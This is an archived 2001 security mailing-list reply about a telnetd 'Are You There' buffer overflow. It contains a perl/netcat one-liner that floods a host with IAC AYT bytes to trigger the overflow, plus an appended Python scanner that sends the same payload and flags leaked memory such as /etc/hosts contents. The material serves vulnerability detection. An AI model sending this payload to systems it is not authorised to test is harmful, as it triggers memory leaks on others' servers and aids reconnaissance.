Re: Telnetd AYT overflow scanner

From: David Maxwell (davidat_private)
Date: Thu Jul 26 2001 - 11:20:39 PDT


On Wed, Jul 25, 2001 at 04:18:00PM -0400, der Mouse wrote:
> Quite aside from the _horrible_ misuse of sprintf, this writes a NUL
> one byte past the end of sendbuffer[].
> 
> I sure wouldn't trust anything about my system to code from whoever
> wrote this.  Just on a quick once-over, I see seven other things I
> would say are wrong with it.

In particular, it can't be trusted to properly assess vulnerability.

In tests against a known vulnerable NetBSD 1.4 telnetd, this tool
reports 'not vulnerable'.

Deciding vulnerability based on only the output (or lack of) from the
telnetd is insufficient. In the NetBSD 1.4 case, the overflow causes
parts of the process's memory space (such as /etc/nsswitch.conf, and
/etc/hosts) to end up in the output buffer and be sent to the client.

I would advise that people not believe their systems are safe based on
the output from the posted code.

For manual inspection, if you have perl and netcat available, try:

perl -e 'for ($i=0;$i<512;$i++) { print "\377\366" }' | nc testhost telnet

While it's possible to have output that looks 'safe' from a run of this
line, certain broken servers will stand out. If you see data in the
output which shouldn't be there, the server is vulnerable.

Note that the exploit posted earlier won't work against even slightly
different systems (like NetBSD 1.3 or NetBSD 1.4), though the perl line
above will show they clearly overflow, and an exploit could be
constructed.

-- 
David Maxwell, davidat_private
Net Musing #5: Redundancy in a network doesn't mean two of everything and
half the staff to run it.
                                              - Tomas T. Peiser, CET

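The perl/netcat one-liner in the message above sends 512 IAC AYT (0xFF 0xF6) pairs and leaves the reader to eyeball the reply for data that should not be there. The script below is an added example (not code from the post or from NetBSD) that automates that inspection: it builds the same probe, strips telnet option negotiation from the reply so it does not hide the signal, discounts the per-AYT acknowledgements, and reports whatever is left. It assumes a BSD-derived telnetd answers each AYT with the text "\r\n[Yes]\r\n"; that string, the `probe_host` helper and the two sample replies are assumptions and constructed data, not captures from a real server.

```python
"""Probe a telnetd with repeated IAC AYT and report data that should not be there.

Added example, not part of the original post. Assumes a BSD-derived telnetd
replies to AYT with "\r\n[Yes]\r\n" (assumption). Anything left after removing
option negotiation and those replies (and any caller-supplied banner text) is
the "data which shouldn't be there" the post tells you to look for.
"""
import socket

IAC, DONT, DO, WONT, WILL, SB, SE, AYT = 255, 254, 253, 252, 251, 250, 240, 246
AYT_REPLY = b"\r\n[Yes]\r\n"   # assumed BSD telnetd text reply to AYT


def build_ayt_probe(count=512):
    """Same payload as the perl one-liner: `count` copies of IAC AYT."""
    return bytes([IAC, AYT]) * count


def strip_telnet_commands(data):
    """Remove IAC command sequences from a telnet byte stream.

    Returns (cleaned_bytes, commands): the in-band data with all IAC
    sequences removed, and the list of removed sequences so the caller
    can still see what the server negotiated.
    """
    out = bytearray()
    commands = []
    i, n = 0, len(data)
    while i < n:
        b = data[i]
        if b != IAC:
            out.append(b)
            i += 1
            continue
        if i + 1 >= n:                 # truncated command at end of stream
            commands.append(data[i:])
            break
        cmd = data[i + 1]
        if cmd == IAC:                 # IAC IAC is an escaped 0xFF data byte
            out.append(IAC)
            i += 2
        elif cmd in (DO, DONT, WILL, WONT):   # three-byte option command
            commands.append(data[i:i + 3])
            i += 3
        elif cmd == SB:                # subnegotiation runs until IAC SE
            end = data.find(bytes([IAC, SE]), i + 2)
            end = n if end < 0 else end + 2
            commands.append(data[i:end])
            i = end
        else:                          # two-byte command (NOP, GA, ...)
            commands.append(data[i:i + 2])
            i += 2
    return bytes(out), commands


def analyze_ayt_response(data, sent=512, ignore=()):
    """Classify a telnetd reply to `sent` AYT probes.

    `ignore` holds byte strings known to be legitimate output for this host
    (for example the login banner seen on a connection that sent no AYTs).
    Only what remains after removing negotiation, AYT replies and the
    ignored text counts as unexpected. A low reply count is reported but
    is NOT treated as evidence either way, matching the post's warning
    that quiet output can still come from a vulnerable server.
    """
    text, commands = strip_telnet_commands(data)
    yes_count = text.count(AYT_REPLY)
    leftover = text.replace(AYT_REPLY, b"")
    for pattern in ignore:
        leftover = leftover.replace(pattern, b"")
    return {
        "ayt_replies": yes_count,
        "ayt_sent": sent,
        "negotiation": len(commands),
        "unexpected": leftover,
        "suspicious": leftover.strip() != b"",
    }


def probe_host(host, port=23, count=512, timeout=3.0):
    """Send the probe to a live telnetd and return everything it sends back.

    Network helper (assumed usage, not run offline): reads until the server
    closes the connection or `timeout` seconds pass with no data.
    """
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_ayt_probe(count))
        chunks = []
        try:
            while True:
                chunk = s.recv(65536)
                if not chunk:
                    break
                chunks.append(chunk)
        except socket.timeout:
            pass
    return b"".join(chunks)


# Constructed samples (not real captures). The "leaky" one mimics the post's
# description: negotiation, some AYT replies, then file contents from the
# server's memory (here something /etc/hosts-like) mixed into the output.
SAMPLE_LEAKY = (
    bytes([IAC, DO, 24]) + bytes([IAC, WILL, 1])
    + AYT_REPLY * 3
    + b"127.0.0.1\tlocalhost\n::1\tlocalhost\n"
    + AYT_REPLY
)
SAMPLE_CLEAN = bytes([IAC, DO, 24]) + AYT_REPLY * 4

if __name__ == "__main__":
    for name, sample in (("leaky", SAMPLE_LEAKY), ("clean", SAMPLE_CLEAN)):
        print(name, analyze_ayt_response(sample, sent=4))
```

To use it against a test host, feed `probe_host("testhost")` to `analyze_ayt_response`, and pass the banner captured from a plain connection in `ignore` so a login prompt is not mistaken for leakage. The verdict is deliberately one-sided: unexpected data is strong evidence of the overflow, while an empty result is not a clean bill of health, which is exactly the point the post makes about tools that decide vulnerability from quiet output.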



    This archive was generated by hypermail 2b30 : Thu Jul 26 2001 - 14:15:09 PDT